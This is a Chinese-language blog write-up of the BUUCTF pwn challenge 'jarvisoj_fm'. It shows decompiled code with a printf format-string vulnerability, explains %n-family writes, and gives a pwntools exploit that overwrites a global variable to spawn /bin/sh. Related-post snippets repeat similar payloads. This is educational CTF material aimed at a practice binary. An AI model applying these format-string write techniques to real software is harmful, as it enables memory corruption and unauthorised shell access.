BUUCTF 刷题 jarvisoj_fm

最新推荐文章于 2023-07-11 21:10:41 发布
最新推荐文章于 2023-07-11 21:10:41 发布
阅读量347 收藏
点赞数 1
分类专栏: 笔记 文章标签: pwn 经验分享 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Helloity/article/details/122911844
版权

题目:BUUCTF在线评测

checksec一下,32位程序,有canary,开NX

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

放到ida里f5一下,发现一个明显的printf格式化字符串漏洞,我们需要控制x的值为4,就可以获得binsh

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [esp+2Ch] [ebp-5Ch]
  unsigned int v5; // [esp+7Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  be_nice_to_people();
  memset(&buf, 0, 0x50u);
  read(0, &buf, 0x50u);
  printf(&buf);
  printf("%d!\n", x);
  if ( x == 4 )
  {
    puts("running sh...");
    system("/bin/sh");
  }
  return 0;
}

格式化字符串研究了一会,这个算是比较简单的了。改写data段里的x。先用笨方法获得我们格式化字符串传参的地址偏移,发现是第11个。

aaaa--0xfffb6cec--0x50--0xc2--(nil)--0xc30000--(nil)--0xfffb6de4--(nil)--(nil)--0x50--0x61616161--0x70252d2d--0x70252d2d--0x70252d2d--0x70252d2d--0x70252d2d--0x70252d2d--0x70252d2d--0x70252d2d3!

“%n”是从栈上取一个地址,往这个地址里写入前面字节数的数(解释不清有点)。有个栗子吧:“%100c”是100个字符,“%100c%n”就是往地址里写100这个数字。其中要注意的是,“%hhn”是每次以一个字节写入,“%hn”是每次以两个字节写入,“%n”是每次以四个字节写入,这道题要我们把x改为4,所以用哪个都可。

exp:

from pwn import *

context(os = 'linux',arch = 'i386',log_level = 'debug')
r = process('./fm')
#r = remote('node4.buuoj.cn','26001')

x_addr = 0x0804A02C

#payload = 'aaaa' + '--%p'*20
payload = p32(x_addr) + '%11$hhn'
r.sendline(payload)


r.interactive()
~

Hello Sally
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
FM.zip_FM_FM matlab
09-23
FM的M文件,是基于MATALB环境下运行的
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 3461
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
BUUCTF pwn——jarvisoj_fm
CNS-Enterprise BCC-1701-J
04-13 188
BUUCTF 做题练习
jarvisoj_fm
小白垃圾笔记2
05-20 706
fmtstr_payload(offset,writes,numbwritten=0,write_size='byte')
jarvisoj_fmBUUCTF
qq_41696518的博客
08-31 254
jarvisoj_fmBUUCTF
BUU刷题-Pwn-jarvisoj_fm
一个啥也不会的小菜鸡!
07-11 185
参数位置:从esp的下一个地址为第一个参数。格式化字符串漏洞,改变函数的值。%idx$n:修改某位置的内存。%numc:表示字符串长度。
STM32F103_FM17550.rar
11-12
STM32F103用FM17550,读写RF A 卡,B卡,STM32F103的5个串口通讯,USB通讯,实测可用,自己整合的。欢迎下载,修正。
FM.rar_FM_fm matlab_modulation
09-21
This is an FM Matlab Code.
FM.rar_FM_FM modulation_modulation
07-15
matlab model fm modulation
ToapantaTapiaYagualFM.rar_FM modulation_fm receiver
07-14
A transmisor and receiver FM.
[BUUOJ]jarvisoj_fm
Do1phln的博客
11-07 201
checksec为常规保护,进入IDA分析main逻辑内部判断本题应该是格式化字符串漏洞,因此进行gdb调试,下断点在漏洞printf。查找具体存储位置,发现是在第11位开始存储,所以据此构造exp。处,输入一串字符串后在gdb内。
JarvisOJ fm
PLpa的博客
07-09 1029
这一题是一道格式化字符串漏洞题 关于格式化漏洞的基础,你可以看我前面的博客,里面有提到:https://blog.csdn.net/qq_43986365/article/details/94896862 拿到这一题,我们仍然是先查看保护: 我们可以看到,简单的格式化漏洞题只开了NX和CANARY保护,好的。 接下来我们就可以进入IDA中看一下程序的具体逻辑: 在这里,我们可以看到有一个明显的...
[BUUCTF]PWN——jarvisoj_fm
BangSen1的博客
03-19 298
jarvisoj_fm 例行检查,开启NX和CANARY保护,32位。 运行程序 IDA载入,检索字符串,看见了“/bin/sh”字符串 跟进函数,当x=4的时候执行system(/bin/sh) 存在格式化字符串漏洞,我们可以利用它随意读写的特性让x=4 找一下输入点的参数在栈上存储的位置,手动输入计算得到偏移为11 payload=p32(x_addr)+"%11$n" 首先传入x参数的地址,这个地址存放在栈上偏移为11的位置,利用%11$n,定位到了偏移为11的位置,往这个位置写入数据,写
BUUCTF(pwn)jarvisoj_fm --格式化字符串漏洞
半岛铁盒的博客
08-05 355
简单的格式化字符串漏洞题目 32位,开启了canary和nx保护 知道以上条件就可以计算偏移了 得到偏移为11 from pwn import * r=remote('node3.buuoj.cn',25582) x_addr=0x804A02C payload=p32(x_addr)+"%11$n" r.sendline(payload) r.interactive() payload=p32(x_addr)+"%11$n" 因为要使x的值为4,写入的数据由%11$n前面的参数的长度决定,
【CTF】jarvisoj_fm 1
凉水的博客
07-06 488
jarvisoj_fm
BUUCTF ciscn_2019_ne_5 & jarvisoj_fm
红叶的博客
11-01 672
只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。
BUUCTF-jarvisoj_fm1-WP
Rt1Text的博客
10-30 223
有canary ,题目提升fm,考虑格式化字符串。
[PWN] BUUCTF jarvisoj_fm
空城惜梦的博客
06-05 375
[PWN] BUUCTF jarvisoj_fm 按照惯例checksec ,开启了relro,canary,nx 执行程序,观察程序的逻辑,在打印出输入的字符后,会打印出3! 32IDA打开查看主要函数main,观察到在红框那里存在的很明显的格式化字符串漏洞,而且当x==4时,会得到flag,根据之前执行的程序可知,未修改x之前x的值为3,则若要修改x,需要利用格式化字符串漏洞的任意地址读写 解题思路 利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",
login_window_fm
最新发布
07-13
您提到的 "login_window_fm" 可能是指登录窗口的相关代码。以下是一个简单的使用Python和Tkinter库创建登录窗口的示例: ```python from tkinter import * def login(): username = entry_username.get() ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hello Sally

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值